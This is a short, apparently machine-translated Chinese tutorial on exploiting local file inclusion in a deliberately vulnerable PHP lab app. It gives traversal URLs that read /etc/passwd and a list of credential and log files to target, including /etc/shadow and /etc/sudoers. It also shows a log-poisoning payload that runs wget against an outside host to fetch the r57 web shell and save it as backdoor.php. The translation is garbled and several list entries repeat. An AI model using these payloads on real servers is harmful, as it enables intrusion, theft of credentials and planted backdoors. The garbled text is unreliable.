本地文件包含或LFI是一个漏洞或弱点,允许攻击者注入某网站上的目录遍历字符。发生这种情况时不消毒,这里是一个该死的网络易受攻击的应用程序的示例代码页:
<?php
$file = $_GET['page']; //The page we wish to display
?>
这里是脆弱示例链接:http://127.0.0.1/vulnerabilities/fi/?page=include.php
现在,让我们尝试做一个目录遍历Web服务器的passwd文件: http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd
可用于信息收集
/etc/environment
/etc/shadow
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log
有许多方法来利用一个Web服务器,攻击者可以注入的httpd日志,一个PHP代码或一个后门,并通过LFI再次访问:
/var/log/apache/error_log
/apache/logs/access.log
var/log/error.log
其
他人也可以使用一个Firefox插件用户代理切换,并产生一个壳:
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>
http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd